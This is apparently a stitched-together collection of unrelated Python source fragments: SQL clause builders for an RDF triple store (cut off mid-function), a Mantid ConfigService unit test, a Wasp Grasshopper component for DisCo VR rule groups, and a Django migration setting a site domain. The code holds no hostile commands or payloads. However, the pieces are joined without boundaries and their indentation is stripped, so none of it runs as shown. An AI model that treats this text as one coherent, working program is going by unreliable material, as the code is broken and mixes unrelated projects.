return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(obj,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[self.normalizeTerm(obj.identifier)]
else:
return obj is not None and "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[obj] or None
def buildContextClause(self,context,tableName):
context = context is not None and self.normalizeTerm(context.identifier) or context
if isinstance(context,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.context'%tableName or 'context'),[context]
else:
return context is not None and "%s="%(tableName and '%s.context'%tableName or 'context')+"%s",[context] or None
def buildTypeMemberClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.member'%tableName or 'member'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
clauseStrings.append("%s.member="%tableName+"%s")
if isinstance(s,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(s.identifier))
else:
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return subject and u"%s.member = "%(tableName)+"%s",[subject]
def buildTypeClassClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.klass'%tableName or 'klass'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
clauseStrings.append("%s.klass="%tableName+"%s")
if isinstance(o,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(o.identifier))
else:
paramStrings.append(self.normalizeTerm(o))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return obj is not None and "%s.klass = "%tableName+"%s",[obj] or None
def triples(self, (subject, predicate, obj), context=None):
"""
A generator over all the triples matching pattern. Pattern can
be any objects for comparing against nodes in the store, for
example, RegExLiteral, Date? DateRange?
quoted table: <id>_quoted_statements
asserted rdf:type table: <id>_type_statements
asserted non rdf:type table: <id>_asserted_statements
triple columns: subject,predicate,object,context,termComb,objLanguage,objDatatype
class membership columns: member,klass,context termComb
FIXME: These union all selects *may* be further optimized by joins
"""
quoted_table="%s_quoted_statements"%self._internedId
asserted_table="%s_asserted_statements"%self._internedId
asserted_type_table="%s_type_statements"%self._internedId
literal_table = "%s_literal_statements"%self._internedId
c=self._db.cursor()
parameters = []
if predicate == RDF.type:
#select from asserted rdf:type partition and quoted table (if a context is specified)
            clauseString,params = self.buildClause('typeTable',subject,RDF.type, obj,context,True)
from __future__ import (absolute_import, division, print_function)
import unittest
import os
import testhelpers
from mantid.kernel import (ConfigService, ConfigServiceImpl, config,
std_vector_str, FacilityInfo, InstrumentInfo)
class ConfigServiceTest(unittest.TestCase):
__dirs_to_rm = []
__init_dir_list = ''
def test_singleton_returns_instance_of_ConfigService(self):
self.assertTrue(isinstance(config, ConfigServiceImpl))
def test_getLocalFilename(self):
local = config.getLocalFilename().lower()
self.assertTrue('local' in local)
def test_getUserFilename(self):
user = config.getUserFilename().lower()
self.assertTrue('user' in user)
def test_getFacilityReturns_A_FacilityInfo_Object(self):
facility = config.getFacility()
self.assertTrue(isinstance(facility, FacilityInfo))
def test_getFacility_With_Name_Returns_A_FacilityInfo_Object(self):
facility = config.getFacility("ISIS")
self.assertTrue(isinstance(facility, FacilityInfo))
self.assertRaises(RuntimeError, config.getFacility, "MadeUpFacility")
def test_getFacilities_Returns_A_FacilityInfo_List(self):
facilities = config.getFacilities()
self.assertTrue(isinstance(facilities[0], FacilityInfo))
def test_getFacilities_and_Facility_Names_are_in_sync_and_non_empty(self):
facilities = config.getFacilities()
names = config.getFacilityNames()
        self.assertTrue(len(names) > 0)
        self.assertEqual(len(names), len(facilities))
        for i in range(len(names)):
            self.assertEqual(names[i], facilities[i].name())
def test_update_and_set_facility(self):
self.assertFalse("TEST" in config.getFacilityNames())
ConfigService.updateFacilities(os.path.join(ConfigService.getInstrumentDirectory(),"IDFs_for_UNIT_TESTING/UnitTestFacilities.xml"))
ConfigService.setFacility("TEST")
        self.assertEqual(config.getFacility().name(), "TEST")
self.assertRaises(RuntimeError, config.getFacility, "SNS")
def test_getInstrumentReturns_A_InstrumentInfo_Object(self):
self.assertTrue(isinstance(config.getInstrument("WISH"), InstrumentInfo))
self.assertRaises(RuntimeError, config.getInstrument, "MadeUpInstrument")
def test_service_acts_like_dictionary(self):
test_prop = "algorithms.retained"
self.assertTrue(config.hasProperty(test_prop))
dictcall = config[test_prop]
fncall = config.getString(test_prop)
        self.assertEqual(dictcall, fncall)
        self.assertNotEqual(config[test_prop], "")
        old_value = fncall
        config.setString(test_prop, "1")
        self.assertEqual(config.getString(test_prop), "1")
        config[test_prop] = "2"
        self.assertEqual(config.getString(test_prop), "2")
config.setString(test_prop, old_value)
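        # Dictionary-style access is shorthand for the explicit calls, e.g.
        # (illustrative): config["algorithms.retained"] returns the same
        # string as config.getString("algorithms.retained").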
def test_getting_search_paths(self):
"""Retrieve the search paths
"""
paths = config.getDataSearchDirs()
        self.assertEqual(type(paths), std_vector_str)
        self.assertTrue(len(paths) > 0)
def test_setting_paths_via_single_string(self):
new_path_list = self._setup_test_areas()
path_str = ';'.join(new_path_list)
config.setDataSearchDirs(path_str)
paths = config.getDataSearchDirs()
        # Clean up here so that if the assert fails
        # it doesn't bring all the other tests down
        self._clean_up_test_areas()
        self.assertEqual(len(paths), 2)
self.assertTrue('tmp' in paths[0])
self.assertTrue('tmp_2' in paths[1])
self._clean_up_test_areas()
def test_setting_log_channel_levels(self):
        testhelpers.assertRaisesNothing(self, config.setFileLogLevel, 4)
testhelpers.assertRaisesNothing(self, config.setConsoleLogLevel, 4)
def _setup_test_areas(self):
"""Create a new data search path string
"""
self.__init_dir_list = config['datasearch.directories']
        # Set new paths - make a temporary directory so that I know where it is
test_path = os.path.join(os.getcwd(), "tmp")
try:
os.mkdir(test_path)
self.__dirs_to_rm.append(test_path)
except OSError:
pass
test_path_two = os.path.join(os.getcwd(), "tmp_2")
try:
os.mkdir(test_path_two)
self.__dirs_to_rm.append(test_path_two)
except OSError:
pass
return [test_path, test_path_two]
def _clean_up_test_areas(self):
config['datasearch.directories'] = self.__init_dir_list
# Remove temp directories
for p in self.__dirs_to_rm:
try:
os.rmdir(p)
except OSError:
pass
if __name__ == '__main__':
unittest.main()
# Wasp: Discrete Design with Grasshopper plug-in (GPL) initiated by Andrea Rossi
#
# This file is part of Wasp.
#
# Copyright (c) 2017, Andrea Rossi <a.rossi.andrea@gmail.com>
# Wasp is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# Wasp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Wasp; If not, see <http://www.gnu.org/licenses/>.
#
# @license GPL-3.0 <https://www.gnu.org/licenses/gpl.html>
#
# Significant parts of Wasp have been developed by Andrea Rossi
# as part of research on digital materials and discrete design at:
# DDU Digital Design Unit - Prof. Oliver Tessmann
# Technische Universität Darmstadt
#########################################################################
## COMPONENT INFO ##
#########################################################################
"""
Export Wasp information for DisCo VR software
-
Provided by Wasp 0.5
Args:
NAME: Rule group name. It will be used to activate/deactivate the rules contained in DisCo
GR: Rule grammars to be included in the group
Returns:
RULE_G: Rule Group instance
"""
ghenv.Component.Name = "Wasp_DisCo Rule Group"
ghenv.Component.NickName = 'RuleG'
ghenv.Component.Message = 'v0.5.005'
ghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application
ghenv.Component.Category = "Wasp"
ghenv.Component.SubCategory = "7 | DisCo VR"
try: ghenv.Component.AdditionalHelpFromDocStrings = "5"
except: pass
import sys
import json
import Rhino.Geometry as rg
import Grasshopper as gh
## add Wasp install directory to system path
wasp_loaded = False
ghcompfolder = gh.Folders.DefaultAssemblyFolder
if ghcompfolder not in sys.path:
sys.path.append(ghcompfolder)
try:
from wasp import __version__
wasp_loaded = True
except:
msg = "Cannot import Wasp. Is the wasp folder available in " + ghcompfolder + "?"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Error, msg)
## if Wasp is installed correctly, load the classes required by the component
if wasp_loaded:
from wasp.disco import DisCoRuleGroup
def main(group_name, rule_grammar):
check_data = True
## check inputs
if group_name is None:
check_data = False
msg = "No group name provided"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
if len(rule_grammar) == 0:
check_data = False
msg = "No rules grammar provided"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
if check_data:
return DisCoRuleGroup(group_name, rule_grammar)
else:
return -1
result = main(NAME, GR)
if result != -1:
    RULE_G = result
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "choimirai.com",
"name": "Django Tutorial"
        }
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "example.com",
"name": "example.com"
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
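# To apply or revert this migration with the standard Django commands
# (illustrative; the exact migration labels depend on the project):
#   python manage.py migrate sites
#   python manage.py migrate sites 0001_initial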